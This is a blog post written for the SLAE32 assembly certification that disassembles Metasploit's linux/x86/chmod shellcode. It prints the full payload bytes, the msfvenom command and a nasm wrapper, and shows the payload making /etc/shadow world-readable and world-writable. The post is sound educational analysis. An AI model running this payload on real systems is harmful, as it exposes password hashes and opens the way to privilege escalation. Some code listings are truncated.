SLAE32 Assignment 5.2 - Analyzing msf chmod

13 minute read


For the fifth assignment in the SLAE32 course we were tasked with analyzing three shellcodes from the Metasploit Framework.

  • In this blog post we will be analyzing the linux/x86/chmod payload.
  • This shellcode will change the permissions of the file /etc/shadow on the victims device allowing any and all users to read & write to the file.

Choosing the longer Path

There are much easier ways of creating an executable to test the shellcode than what is shown here. Instead we could have used the C program provided, output the shellcode into a file, or piped the payload to the analysis program.

  • The method of adding the shellcode to our own JMP|Call|POP Assembly program was used to gain a better grasp on the assembly concepts.

Settings for our MSF chmod payload

root# msfvenom --payload linux/x86/chmod --list-options
Name  Current Setting  Required  Description
----  ---------------  --------  -----------
FILE  /etc/shadow      yes       Filename to chmod
MODE  0666             yes       File mode (octal)

  Runs chmod on specified file with specified mode

Preparing the Shellcode for gdb & disasm Analysis

Generating the chmod Shellcode

root@zed# msfvenom -p linux/x86/chmod --format python 2>/dev/null | \
> egrep "^buf " | sed -e 's/buf /sc /g'
sc =  ""
sc += "\x99\x6a\x0f\x58\x52\xe8\x0c\x00\x00\x00\x2f\x65\x74"
sc += "\x63\x2f\x73\x68\x61\x64\x6f\x77\x00\x5b\x68\xb6\x01"
sc += "\x00\x00\x59\xcd\x80\x6a\x01\x58\xcd\x80"
  • We will export the shellcode to the python format.
    • This will allow us to add the shellcode to our python script for formatting.
  • Once we generate the correct format for our shellcode, we will add it to our JMP|Call|POP assembly program.
    • This will allow us to easily analyze the shellcode with gdb and disasm.

Formatting the Shellcode for Assembly Compilation

  • We will copy the sc python variable generated above, and add it to our python script.
  • Typically msfvenom generates the shellcode in the \x99 we see above.
  • We need the shellcode to be in the 0x99, format.
    • Assembly requires we use the 0x99, format for assigning a hex string to memory.

Our Python Script to Format the Hex Code

# Filename:
# Author:   boku
# Purpose:  A python script that converts the '\x' format to '0x ,'

# Add the shellcode hex here.
sc =  ""
sc += "\x99\x6a\x0f\x58\x52\xe8\x0c\x00\x00\x00\x2f\x65\x74"
sc += "\x63\x2f\x73\x68\x61\x64\x6f\x77\x00\x5b\x68\xb6\x01"
sc += "\x00\x00\x59\xcd\x80\x6a\x01\x58\xcd\x80"

output = ""
print 'Encoded shellcode ...'
for x in bytearray(sc) :
        output += '0x'
        output += '%02x,' %x
print output

Generating the Hex in the 0x , Format

root# python
Encoded shellcode ...
  • The \<Return> at the end was added after for formatting.
    • This format does work when compiling shellcode with nasm.
    • Nasm does not seem to care about <space> characters either.

Adding the Shellcode to our JMP|Call|POP Assembly Program

; Filename: jmpCallPop.nasm
; Author:  Bobby Cooke
global _start
section .text
; 1. Jump to where our Shellcode string is
  jmp short call_shellcode
  pop esi
; 3. Now that the memory location of our string is on the top of the
;     stack, we will pass control to it using the jmp instruction.
  pop eax
  jmp eax
; 2. Call to the instruction that will jump us into our Shellcode
;    - Call is like jump, but stores the memory location of the next
;       instruction onto the Stack; which is our Shellcode.
  call jmp2_shellcode
  shellcode: db 0x99,0x6a,0x0f,0x58,0x52,0xe8,0x0c,\
  • To get nasm syntax highlighting in Vim I used the command :set syn=nasm.

Compiling our JMP|Call|POP Shellcode

root# nasm -f elf32 jmpCallPop.nasm -o jmpCallPop.o
root# ld jmpCallPop.o -o jmpCallPop

Testing our chmod Shellcode

root# ls -l /etc/shadow
-rw-r----- 1 root shadow 1074 Sep  3 11:17 /etc/shadow
root# ./jmpCallPop
root# ls -l /etc/shadow
-rw-rw-rw- 1 root shadow 1074 Sep  3 11:17 /etc/shadow
  • The payload will change the file /etc/shadow to the permissions rw-rw-rw-.

Great! Our payload works as intended. Now lets set a breakpoint and analyze the shellcode with gdb.

Disassembling the Shellcode with gdb

We will start the program with gdb, and set a breakpoint for our shellcode. Once control is passed to shellcode we will step through it in gdb.

Setting up gdb for analysis

Starting the Shellcode with gdb

root# gdb ./jmpCallPop

Finding the Memory Location of our Shellcode

gdb-peda$ info functions
All defined functions:
Non-debugging symbols:
0x08048060  _start
0x08048062  decoder
0x08048063  jmp2_shellcode
0x08048066  call_shellcode
0x0804806b  shellcode

Setting the Breakpoint in gdb

gdb-peda$ b shellcode
Breakpoint 1 at 0x804806b

Running & Disassembling the Shellcode

gdb-peda$ run
gdb-peda$ disassemble $eip
Dump of assembler code for function shellcode:
=> 0x0804806b <+0>:     cdq
   0x0804806c <+1>:     push   0xf
   0x0804806e <+3>:     pop    eax
   0x0804806f <+4>:     push   edx
   0x08048070 <+5>:     call   0x8048081 <shellcode+22>
   0x08048075 <+10>:    das
   0x08048076 <+11>:    gs
   0x08048077 <+12>:    je     0x80480dc
   0x08048079 <+14>:    das
   0x0804807a <+15>:    jae    0x80480e4
   0x0804807c <+17>:    popa
   0x0804807d <+18>:    outs   dx,DWORD PTR fs:[esi]
   0x0804807f <+20>:    ja     0x8048081 <shellcode+22>
   0x08048081 <+22>:    pop    ebx
   0x08048082 <+23>:    push   0x1b6
   0x08048087 <+28>:    pop    ecx
   0x08048088 <+29>:    int    0x80
   0x0804808a <+31>:    push   0x1
   0x0804808c <+33>:    pop    eax
   0x0804808d <+34>:    int    0x80
End of assembler dump.

Great! Now we will break these instructions into systemcall sections and then disect them block by block.

Dividing the Shellcode by Systemcalls

Since we know that the instruction int 0x80 is used to execute linux systemcalls, we will use this knowlege to divid this shellcode into two sections.
We also know that the value of the eax register controls which systemcall will be executed.

  • Our first systemcall has the eax value of 0xf.
  • Our second systemcall has the eax value of 0x1.

chmod() Systemcall Section

Finding the Systemcall in the Header File

i /usr/include/i386-linux-gnu/asm/unistd_32.h
  #define __NR_chmod               15
  • The hex value 0xf translates to 15 in decimal.

chmod() C Function

root# man 2 chmod
  int chmod(const char *path, mode_t mode);
       EAX         EBX             ECX
  • The corresonding assembly register values have been tagged onto the C function.

chmod() Broken Down by Blocks

First Block

=> 0x0804806b <+0>:     cdq
   0x0804806c <+1>:     push   0xf
   0x0804806e <+3>:     pop    eax
   0x0804806f <+4>:     push   edx
  1. Instruction cdq is used to clear out the edx register.
    • cqd - Covert Doubleword to Quadword
      • a Doubleword is 32 bits (one register)
      • a Quadword is 64 bits (two registers)
      • if eax is a positive value, the edx will be clear - edx: 0x00000000
      • if eax is a negiative value, the edx will be full - edx: 0xffffffff
  2. Instruction push 0xf pushes the byte 0xf onto the top of the stack.
  3. Instruction pop eax puts the value 0xf into the eax register from the top of the stack.
    • EAX: 0xf
    • This is the EAX value for the chmod systemcall.
  4. Instruction push edx pushes 4 bytes 0x00 (a dword) onto the top of the stack.

Second Block

This block of code uses the call instruction to jump over the block shown here, and continue execution of the shellcode.

   0x08048070 <+5>:     call   0x8048081 <shellcode+22>
   0x08048075 <+10>:    das
   0x08048076 <+11>:    gs
   0x08048077 <+12>:    je     0x80480dc
   0x08048079 <+14>:    das
   0x0804807a <+15>:    jae    0x80480e4
   0x0804807c <+17>:    popa
   0x0804807d <+18>:    outs   dx,DWORD PTR fs:[esi]
   0x0804807f <+20>:    ja     0x8048081 <shellcode+22>
  • When the call instruction is executed, the memory location of the next instruction will be stored otno the top of the stack before maing the jump.
  • The memory location stored on the top of the stack is actually the address of our string used for the filename /etc/shadow.
    • Any time I see das after a call in shellcode, it typically means it is a string operation.
Pointer to /etc/shadow string on the top of the Stack
0000| 0xbffff588 --> 0x8048074 (<shellcode+10>: das)

Third Block

This block finishes setting up the registers and then executes the chmod systemcall.

   0x08048081 <+22>:    pop    ebx
   0x08048082 <+23>:    push   0x1b6
   0x08048087 <+28>:    pop    ecx
   0x08048088 <+29>:    int    0x80

Looking back at our C chmod() function, and it’s required arguments.

  int chmod(const char *path, mode_t mode);
       EAX         EBX             ECX
  • const char *path
    • This means the EBX register will be a pointer to the memory location holding our string /etc/shadow.
  • mode_t mode
    • This meas the ECX register will hold the permissions we wish to change the file to.

Consulting the manual pages with man 2 chmod, we find the following for the mode.

 The new file permissions are specified in mode, which is a bit mask  created  by  ORing
together zero or more of the following:
S_ISUID  (04000)  set-user-ID (set process effective user ID on execve(2))
S_ISGID  (02000)  set-group-ID  (set process effective group ID on execve(2); mandatory
                  locking, as described in fcntl(2); take a new file's group from  par‐
                  ent directory, as described in chown(2) and mkdir(2))
S_ISVTX  (01000)  sticky bit (restricted deletion flag, as described in unlink(2))
S_IRUSR  (00400)  read by owner
S_IWUSR  (00200)  write by owner
S_IXUSR  (00100)  execute/search  by owner ("search" applies for directories, and means
                  that entries within the directory can be accessed)
S_IRGRP  (00040)  read by group
S_IWGRP  (00020)  write by group
S_IXGRP  (00010)  execute/search by group
S_IROTH  (00004)  read by others
S_IWOTH  (00002)  write by others
S_IXOTH  (00001)  execute/search by others
  • The instruction push 0x1b6 and pop ecx are used to fufill the mode arguement.
  • Hex 1b6 translates to 666 in ocatal. This sets read(4) & write(2) permissions for user, group, and others.

exit() Systemcall Section

  • Our second systemcall had the hex value 0x1 in the eax register.

    Finding the Systemcall in the Header File

root# vi /usr/include/i386-linux-gnu/asm/unistd_32.h
      #define __NR_exit                 1

exit C Function

  • The corresonding assembly register values have been tagged onto the C function.
 void _exit(int status);
       EAX     EBX
Exit Block
   0x0804808a <+31>:    push   0x1
   0x0804808c <+33>:    pop    eax
   0x0804808d <+34>:    int    0x80
  • before the exit systemcall, its number 0x1 is popped into the eax register from the stack.
  • The value in the ebx register doesn’t really matter since it is just the exit code number.

SLAE32 Blog Proof

This blog post has been created for completing the requirements
 of the SecurityTube Linux Assembly Expert certification:
	- Now at:
SLAE/Student ID: PA-10913
